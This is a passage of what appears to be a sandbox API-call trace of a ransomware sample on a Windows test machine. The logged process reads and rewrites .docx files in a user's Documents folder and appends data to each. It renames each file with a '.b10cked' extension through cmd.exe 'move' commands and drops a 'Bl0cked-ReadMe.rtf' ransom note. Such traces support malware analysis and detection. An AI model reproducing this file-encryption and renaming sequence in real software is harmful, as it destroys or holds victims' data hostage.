dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.902] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xe34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xe34, lpOverlapped=0x0) returned 1 [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.902] WriteFile (in: hFile=0x114, lpBuffer=0x127cb28*, nNumberOfBytesToWrite=0xe34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127cb28*, lpNumberOfBytesWritten=0x12ec1c*=0xe34, lpOverlapped=0x0) returned 1 [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=-3636, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xe37 [0134.902] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xe34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xe34, lpOverlapped=0x0) returned 1 [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=-3636, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xe37 [0134.902] WriteFile (in: hFile=0x114, lpBuffer=0x127cb28*, nNumberOfBytesToWrite=0xe34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127cb28*, lpNumberOfBytesWritten=0x12ec1c*=0xe34, lpOverlapped=0x0) returned 1 [0134.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-V83XFbt5-FsW.docx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0134.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-V83XFbt5-FsW.docx", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-V83XFbt5-FsW.docx", lpUsedDefaultChar=0x0) returned 18 [0134.907] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1c6b [0134.907] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.908] CloseHandle (hObject=0x114) returned 1 [0134.908] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\-V83XFbt5-FsW.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC") returned 0x26 [0134.909] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.909] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbc4, dwThreadId=0xb8c)) returned 1 [0134.911] CloseHandle (hObject=0x110) returned 1 [0134.911] CloseHandle (hObject=0x114) returned 1 [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0134.911] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount2=46) returned 3 [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0134.911] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0134.911] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0134.911] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0134.912] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0134.912] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.912] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0134.912] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0134.912] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb88, dwThreadId=0xbb4)) returned 1 [0134.913] CloseHandle (hObject=0x110) returned 1 [0134.913] CloseHandle (hObject=0x114) returned 1 [0134.913] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0134.914] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.914] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0134.914] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0134.914] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2VgMmRhPzB7.docx" (normalized: "c:\\users\\eebsym5\\documents\\2vgmmrhpzb7.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.914] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19170372100) returned 1 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2e88 [0134.916] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3370 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3370 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.918] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19b7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19b7, lpOverlapped=0x0) returned 1 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.918] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19b7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19b7, lpOverlapped=0x0) returned 1 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6583, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b9 [0134.918] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19b7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19b7, lpOverlapped=0x0) returned 1 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6583, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b9 [0134.918] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19b7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19b7, lpOverlapped=0x0) returned 1 [0134.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2VgMmRhPzB7.docx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2VgMmRhPzB7.docx", cchWideChar=16, lpMultiByteStr=0x1328834, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2VgMmRhPzB7.docx", lpUsedDefaultChar=0x0) returned 16 [0134.940] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3370 [0134.940] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.941] CloseHandle (hObject=0x114) returned 1 [0134.941] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2VgMmRhPzB7.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC") returned 0x26 [0134.942] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.942] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc54, dwThreadId=0xc2c)) returned 1 [0134.948] CloseHandle (hObject=0x110) returned 1 [0134.948] CloseHandle (hObject=0x114) returned 1 [0134.948] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.948] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.948] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\8rVd3erYRX.docx" (normalized: "c:\\users\\eebsym5\\documents\\8rvd3eryrx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.948] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19173773047) returned 1 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] 